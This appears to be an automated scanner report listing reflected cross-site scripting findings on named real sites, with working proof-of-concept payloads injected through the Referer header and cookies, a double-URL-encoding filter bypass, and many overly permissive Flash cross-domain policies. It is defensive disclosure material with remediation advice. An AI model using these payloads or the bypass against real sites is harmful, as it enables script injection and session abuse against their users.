The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4664%2522%253balert%25281%2529%252f%252fc4f26dbd9fc was submitted in the Referer HTTP header. This input was echoed as a4664";alert(1)//c4f26dbd9fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=a4664%2522%253balert%25281%2529%252f%252fc4f26dbd9fc
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:27:38 GMT Server: Apache X-Powered-By: PHP/5.2.16 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 96589
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload a8199<script>alert(1)</script>9d3863d50ae was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=a8199<script>alert(1)</script>9d3863d50ae
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:27:40 GMT Server: Apache X-Powered-By: PHP/5.2.16 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 96613
The value of the JSESSIONID cookie is copied into the HTML document as plain text between tags. The payload 416eb<script>alert(1)</script>ad99e449219 was submitted in the JSESSIONID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
{"token":"99A6B622412B24DBC05018F5AF4B46BC.bau10416eb<script>alert(1)</script>ad99e4492191304374524694","tlcs":[{"tlc":"26969","thumb":"/autostrade/FrameTelecamera?tipo=T&tlc=26969","description":"A1 Diramazione Roma nord - GRA Km. 09,9 Castelnuovo di Porto"},{"tlc":"38914","thumb":"/autos ...[SNIP]...
The value of the ultimeTrePagine cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60622'-alert(1)-'66d057b537f was submitted in the ultimeTrePagine cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ultimeTrePagine cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cad1b'-alert(1)-'d7d638a9938 was submitted in the ultimeTrePagine cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ad-emea.doubleclick.net
Response
HTTP/1.0 200 OK Server: DCLK-HttpSvr Content-Type: text/xml Content-Length: 393 Last-Modified: Wed, 22 Oct 2008 18:22:36 GMT Date: Mon, 02 May 2011 22:45:44 GMT
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <!-- Policy file for http://www.doubleclick.net --> <cross-domain-policy> <site- ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]...
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ad78.neodatagroup.com
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:17:39 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g Last-Modified: Mon, 12 Oct 2009 10:53:26 GMT ETag: "5d8989-c9-475babd3b7580" Accept-Ranges: bytes Content-Length: 201 Cache-Control: max-age=0 Expires: Mon, 02 May 2011 22:17:39 GMT Connection: close Content-Type: application/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: adlev.neodatagroup.com
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:21:47 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g Last-Modified: Mon, 12 Oct 2009 10:53:26 GMT ETag: "5d8989-c9-475babd3b7580" Accept-Ranges: bytes Content-Length: 201 Cache-Control: max-age=0 Expires: Mon, 02 May 2011 22:21:47 GMT Connection: close Content-Type: application/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: bs.serving-sys.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT Accept-Ranges: bytes ETag: "0e2c3cba13c91:0" P3P: CP="NOI DEVa OUR BUS UNI" Date: Mon, 02 May 2011 22:33:24 GMT Connection: close Content-Length: 100
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: cdn1.eyewonder.com
Response
HTTP/1.0 200 OK Last-Modified: Fri, 07 Nov 2008 23:34:25 GMT ETag: "4418f35e3141c91:139e" Content-Length: 195 Content-Type: text/xml Accept-Ranges: bytes Server: Microsoft-IIS/6.0 p3p: policyref="/200125/w3c/p3p.xml", CP="NOI DSP LAW NID PSA OUR IND NAV STA COM" X-Powered-By: ASP.NET Cache-Control: max-age=2828 Expires: Mon, 02 May 2011 23:04:13 GMT Date: Mon, 02 May 2011 22:17:05 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: cdn4.eyewonder.com
The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: documenti.camera.it
Response
HTTP/1.0 200 OK Cache-Control: No-Cache Pragma: No-Cache Content-Length: 1225 Content-Type: text/xml Last-Modified: Tue, 25 Jan 2011 14:36:58 GMT Accept-Ranges: bytes ETag: "371bff519dbccb1:16c7" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 02 May 2011 22:24:34 GMT X-Cache: MISS from ns1.camera.it Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ds.serving-sys.com
Response
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Thu, 20 Aug 2009 15:36:15 GMT Server: Microsoft-IIS/6.0 P3P: policyref=http://www.eyeblaster.com/p3p/Eyeblaster-served-p3p2.xml,CP="NOI DEVa OUR BUS UNI" Date: Mon, 02 May 2011 22:33:24 GMT Content-Length: 100 Connection: close Accept-Ranges: bytes
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: elstatic.weborama.fr
Response
HTTP/1.0 200 OK Accept-Ranges: bytes Cache-Control: max-age=604800 Content-Type: text/xml Date: Mon, 02 May 2011 23:05:02 GMT ETag: "1171997018" Expires: Mon, 09 May 2011 23:05:02 GMT Last-Modified: Thu, 13 Dec 2007 13:37:01 GMT Server: ECAcc (dca/53CF) X-Cache: HIT Content-Length: 201 Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: eprocurement.eni.it
Response
HTTP/1.1 200 OK Content-Length: 207 Content-Type: text/xml Last-Modified: Wed, 23 Mar 2011 10:31:45 GMT Accept-Ranges: bytes ETag: "1735e18145e9cb1:12e6" Server: Microsoft-IIS/6.0 Date: Mon, 02 May 2011 22:24:14 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: fls.doubleclick.net
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: ieo.solution.weborama.fr
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 23:04:57 GMT Server: Apache Last-Modified: Mon, 20 Oct 2008 13:27:23 GMT ETag: "2a8005-6c-459af467404c0" Accept-Ranges: bytes Content-Length: 108 Connection: close Content-Type: application/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: media.fastclick.net
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: metrics.ilsole24ore.com
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:17:43 GMT Server: Omniture DC/2.0.0 xserver: www313 Connection: close Content-Type: text/html
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: mfr.247realmedia.com
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:16:16 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Last-Modified: Thu, 10 Jan 2008 16:02:57 GMT ETag: "3fd213-d0-4436057df0e40" Accept-Ranges: bytes Content-Length: 208 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/xml Set-Cookie: NSC_n1efm_qppm_iuuq=ffffffff09097b8445525d5f4f58455e445a4a423660;path=/;httponly
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: omniture.virgilio.it
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:16:17 GMT Server: Omniture DC/2.0.0 xserver: www13 Connection: close Content-Type: text/html
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: paginebianche.ilsole24ore.com
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:28:05 GMT Server: Apache Set-Cookie: kpi=173.193.214.243.1304375285304156; path=/; expires=Thu, 29-Apr-21 22:28:05 GMT; domain=.ilsole24ore.com Last-Modified: Wed, 18 Mar 2009 13:14:48 GMT ETag: "670190-d6-4656477ce8200" Accept-Ranges: bytes Content-Length: 214 Connection: close Content-Type: application/xml
The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: paginegialle.ilsole24ore.com
Response
HTTP/1.0 200 OK Server: Apache P3P: CP='NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR SAMa BUS IND UNI COM NAV INT' Last-Modified: Mon, 03 Jul 2006 07:55:31 GMT ETag: "a7cb6a-2e8-44a8cd73" Content-Type: text/xml Date: Mon, 02 May 2011 22:26:38 GMT Content-Length: 744 Connection: close Set-Cookie: kpi=173.193.214.243.1304375198; expires=Sun, 02-May-2021 22:26:38 GMT; path=/; domain=paginegialle.it
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: secure-it.imrworldwide.com
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:17:42 GMT Server: Apache Cache-Control: max-age=604800 Expires: Mon, 09 May 2011 22:17:42 GMT Last-Modified: Wed, 14 May 2008 01:55:09 GMT ETag: "10c-482a467d" Accept-Ranges: bytes Content-Length: 268 Connection: close Content-Type: application/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: statse.webtrendslive.com
Response
HTTP/1.1 200 OK Content-Length: 82 Content-Type: text/xml Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT Accept-Ranges: bytes ETag: "ef9fe45d4643c81:943" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 02 May 2011 22:18:46 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: video.ilsole24ore.com
Response
HTTP/1.1 200 OK Date: Tue, 03 May 2011 00:04:50 GMT Server: Apache/2.0.55 (Ubuntu) mod_jk/1.2.28 PHP/5.1.2 Last-Modified: Tue, 06 Oct 2009 15:51:05 GMT ETag: "278a7e-13b-32a9ec40" Accept-Ranges: bytes Content-Length: 315 Connection: close Content-Type: application/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.luxury24.ilsole24ore.com
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:45:41 GMT Server: Apache/2.0.46 (CentOS) Last-Modified: Tue, 06 Oct 2009 15:51:22 GMT ETag: "15aca3e-13b-33ad5280" Accept-Ranges: bytes Content-Length: 315 Connection: close Content-Type: text/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.motori24.ilsole24ore.com
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:18:17 GMT Server: Apache/2.0.55 (Ubuntu) mod_jk/1.2.28 PHP/5.1.2 Last-Modified: Tue, 06 Oct 2009 15:51:33 GMT ETag: "27dc38-13b-34552b40" Accept-Ranges: bytes Content-Length: 315 Connection: close Content-Type: application/xml
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.yoox.com
Response
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Tue, 03 Nov 2009 15:10:14 GMT Accept-Ranges: bytes ETag: "983995be975cca1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET ORIGIN: Web14 Content-Length: 102 Date: Mon, 02 May 2011 22:45:40 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0 Host: zanox01.webtrekk.net
Response
HTTP/1.1 200 OK Content-Type: text/xml;charset=UTF-8 Content-Length: 106 Date: Mon, 02 May 2011 22:21:14 GMT Connection: close Server: q3/4
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: adimg.alice.it
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:18:32 GMT Server: Apache Last-Modified: Wed, 30 Mar 2011 10:38:32 GMT ETag: "59a-49fb0c73dd6d7" Accept-Ranges: bytes Content-Length: 1434 P3P: policyref="http://adv.alice.it/w3c/p3p.xml", CP=" NOI DSP COR NID" Connection: close Content-Type: text/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: adv.ilsole24ore.it
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:15:14 GMT Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8 P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI" Last-Modified: Tue, 11 Jan 2011 17:00:30 GMT ETag: "118003-132-4d2c8cae" Accept-Ranges: bytes Content-Length: 306 Connection: close Content-Type: application/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0 Host: answers.yahoo.com
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:23:14 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Last-Modified: Thu, 17 Jun 2010 15:57:01 GMT Accept-Ranges: bytes Content-Length: 228 Connection: close Content-Type: application/xml
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: api.bing.com
Response
HTTP/1.0 200 OK Cache-Control: no-cache Content-Length: 634 Content-Type: text/xml Last-Modified: Fri, 01 Oct 2010 21:58:33 GMT ETag: A06DD1053D1686DFCEF21D90E3BAD7190000027A P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml" Date: Mon, 02 May 2011 22:23:14 GMT Connection: close Set-Cookie: _MD=alg=m2&C=2011-05-02T22%3a23%3a14; expires=Thu, 12-May-2011 22:23:14 GMT; domain=.bing.com; path=/ Set-Cookie: _SS=SID=9657056B05E34F21B03456DFC654A712; domain=.bing.com; path=/ Set-Cookie: OVR=flt=0&flt2=0&DomainVertical=0&Cashback=0&MSCorp=kievfinal&GeoPerf=0&Release=or3; domain=.bing.com; path=/ Set-Cookie: SRCHD=D=1753823&MS=1753823; expires=Wed, 01-May-2013 22:23:14 GMT; domain=.bing.com; path=/ Set-Cookie: SRCHUID=V=2&GUID=EB15584ECD52449D90E326E400B536A2; expires=Wed, 01-May-2013 22:23:14 GMT; path=/ Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110502; expires=Wed, 01-May-2013 22:23:14 GMT; domain=.bing.com; path=/
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-http-request-headers-from domain="*.bing.com" he ...[SNIP]... <allow-access-from domain="*.bing.com"/> ...[SNIP]... <allow-access-from domain="blstc.msn.com"/> ...[SNIP]... <allow-access-from domain="stc.sandblu.msn-int.com"/> ...[SNIP]...
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: edition.cnn.com
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:24:06 GMT Server: Apache Last-Modified: Fri, 03 Dec 2010 21:00:13 GMT Accept-Ranges: bytes Content-Length: 2326 Cache-Control: max-age=3600 Expires: Mon, 02 May 2011 23:23:21 GMT Content-Type: application/xml Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: en.camera.it
Response
HTTP/1.1 200 OK Server: nginx Content-Type: text/xml Last-Modified: Tue, 25 Jan 2011 15:13:43 GMT Vary: Accept-Encoding Content-Length: 1023 Date: Mon, 02 May 2011 23:56:10 GMT X-Varnish: 1575094938 Age: 0 Via: 1.1 varnish Connection: close X-Served-By: dmzxmweb04 X-Cache: MISS
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0 Host: finanza-mercati.ilsole24ore.com
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:24:26 GMT Server: Apache/2.2.10 (Linux/SUSE) Last-Modified: Thu, 24 Mar 2011 07:09:47 GMT Accept-Ranges: bytes Content-Length: 218 Vary: User-Agent ETag: "2044e1-da-49f3529aa9469"-gzip Connection: close Content-Type: text/xml
<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0 Host: friendfeed.com
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:24:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 321 Vary: Cookie Server: FriendFeedServer/0.1 Etag: "d69a789b2865b15041af5e97e97c7b933b34666a" Cache-Control: private P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: AT=14162173952499924949_1304375087; Domain=.friendfeed.com; Path=/
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: giochi-tiscali.king.com
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:25:27 GMT Server: Apache Expires: Mon, 02 May 2011 22:35:27 GMT Content-Length: 2487 Content-Type: text/xml; charset=iso-8859-1 Link: </labels.rdf>; /="/"; rel="meta" type="application/rdf+xml"; title="ICRA labels"; Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Request
GET /crossdomain.xml HTTP/1.0 Host: it.yahoo.com
Response
HTTP/1.0 200 OK Date: Mon, 02 May 2011 22:25:38 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Cache-Control: private Last-Modified: Mon, 21 Aug 2006 16:30:13 GMT Accept-Ranges: bytes Content-Length: 228 Content-Type: application/xml Age: 0 Server: YTS/1.20.0
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: itunes.apple.com
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: nuovo.camera.it
Response
